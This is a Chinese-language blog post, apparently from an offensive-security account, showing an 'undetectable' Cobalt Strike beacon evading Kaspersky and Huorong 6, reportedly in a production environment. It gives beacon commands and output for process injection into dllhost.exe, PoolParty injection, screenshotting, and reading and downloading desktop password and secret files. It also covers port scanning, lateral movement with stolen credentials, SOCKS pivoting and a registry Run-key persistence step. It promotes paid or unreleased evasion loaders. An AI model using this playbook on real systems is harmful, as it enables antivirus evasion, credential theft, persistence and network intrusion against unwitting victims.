我们将使用完全无法检测的CobaltStrike,来测试在卡巴斯基与火绒6上操作的表现,如进程注入、屏幕截图、文件操作、端口扫描等,并窃取桌面上的“绝密文件”和“账号密码”,以评估现代杀毒软件的防御能力,所有操作均在生产环境进行。
技术采用
| 编号 | 技术 | 详细 | 备注 |
|---|---|---|---|
| 1 | 特征修补技术 | 完全无法检测的CobaltStrike | 部分公开、付费 |
| 2 | 地狱之门进程注入免杀插件 | 地狱之门进程注入免杀插件 | 已公开 |
| 3 | cobaltstrike-cat-bof | cobaltstrike-cat-bof | 开源 |
| 4 | 泳池派对BOF | 泳池派对bof | 开源 |
| 5 | 态势感知BOF | 态势感知-bof | 开源 |
| 6 | 加载器 | 红队加载器过主流杀软-混淆最终版 | 未公开 |
| 7 | 态势感知BOF | Cobaltstrike4.9.1平台高级匿名技术 | 付费 |
卡巴斯基
卡巴斯基在全版本上都默认具备核心保护,这包括系统行为监控,实时反病毒,以及扫描模块(内存、启动等)。这里我们下载到免费版,然后将它更新到最新。
1. 查杀
由于我们的payload导出后已经进行了特征修补,我们采用红队加载器过主流杀软-混淆最终版 ,该项目代码行数不超过50行。无论我们如何扫描,均提示“未发现风险”。
2. 进程注入
接下来,我们将注入到系统进程以增强隐蔽性。显而易见,我们将不能使用process inject插件 地狱之门进程注入免杀插件 进行进程注入,我们需要读取本地的bin进行注入。使用态势感知BOF中的ntcreatethread注入技术进行操作。
beacon> ntcreatethread 0
这将自动注入至系统进程dllhost.exe。
3. 屏幕截图
由于我们加载了process-inject,直接截图没有问题。
4. 文件操作
在dllhost.exe上进行操作,进入到桌面:
beacon> cd desktop
[*] cd desktop
[+] host called home, sent: 15 bytes
beacon> pwd
[*] Tasked beacon to print working directory
[+] host called home, sent: 8 bytes
[*] Current directory is C:\Users\jack\Desktop
使用cat读取桌面上的账号密码.txt中的内容:
下载桌面上的绝密文件.pdf至本地:
文件内容:
5. 端口扫描
使用portscan技术,这将生成临时进程,以针对目标主机子网进行端口扫描。
ARP选项使用ARP查看系统是否响应指定地址。ICMP选项发送ICMP回显请求。none选项告诉 portscan 工具假定所有主机都处于活动状态。
查看网络内目标主机的服务。
target->service
使用获取的密码jump横向移动连接其他windows主机。或在目标主机设置socks5代理,将系统变成跳板,使用如proxychains代理工具连接网络内其他linux主机。
火绒6
对外提供的完全无法检测的cobaltstrike能轻松绕过火绒,将火绒更新至最新,重复上述操作。
1. 查杀
由于先前文中已介绍了很多,这里不做赘述。
2. 进程注入
卡巴斯基和火绒对行为的监控略有不同,这里我们采用完全无法检测的泳池派对进程注入,以及运行各种BOF均无法检测。
PoolPartyBof 3344 D:\PayloadInResources\test\output.bin 7
3. 截图
inline-execute D:\PayloadInResources\CS-AutoPostChain\dist\screenshot\screenshot.x64.obj
4. 文件操作
5. 注册表维持权限
作用是向开机启动注册表中的当前用户权限注册表写入如下命令cmd.exe /c start /b /min C:\Users\Public\bypass.exe
beacon> inline-execute D:\PayloadInResources\BOF\BOF_Collection\Persistence\RegistryPersistence.x64.o Install
beacon> cd c:\user\public\
beacon> upload D:\PayloadInResources\test\voCaue.exe
总结
杀毒软件到底有没有作用,其实作用不大,防御普通病毒木马绰绰有余,但cobaltstrike却可以在上面横着走。如高级lnk快捷方式,常规杀毒软件无法拦截,无法被拦截的PDF钓鱼等都表明,安全意识才是最需要投入的,篇幅有限,潦草结束。最后:祝大家元旦快乐!明年再战~
免责声明
本文所涉及的信息安全技术知识仅供参考和学习之用,并不构成任何明示或暗示的保证。读者在使用本文提供的信息时,应自行判断其适用性,并承担由此产生的一切风险和责任。本文作者对于读者基于本文内容所做出的任何行为或决定不承担任何责任。在任何情况下,本文作者不对因使用本文内容而导致的任何直接、间接、特殊或后果性损失承担责任。读者在使用本文内容时应当遵守法律法规,并保证不违反任何相关法律法规。
推荐阅读
- 攻防的较量,杀毒软件的致命缺陷
- WPS最新0day漏洞?电脑被控仅仅是一个PDF(含视频)
- 无法被拦截的PDF钓鱼
- 高级lnk快捷方式,常规杀毒软件无法拦截
- [bug修复]完全无法检测的CobaltStrike
- 完全无法检测的CobaltStrike
- 堆栈欺骗和内存扫描绕过
- 地狱之门进程注入官方免杀插件
- Beacon 命令和 OPSEC 操作绕过查杀
- 我有关于免杀的2个概念和3个误区要讲
- 间接系统调用APC注入EDR绕过免杀加载器
- 三步免杀卡巴斯基,免杀数字时长达一周以上
- 免杀HelloWorld,0/71通过所有杀软
欢迎点赞分享并留言,同时欢迎关注视频号。
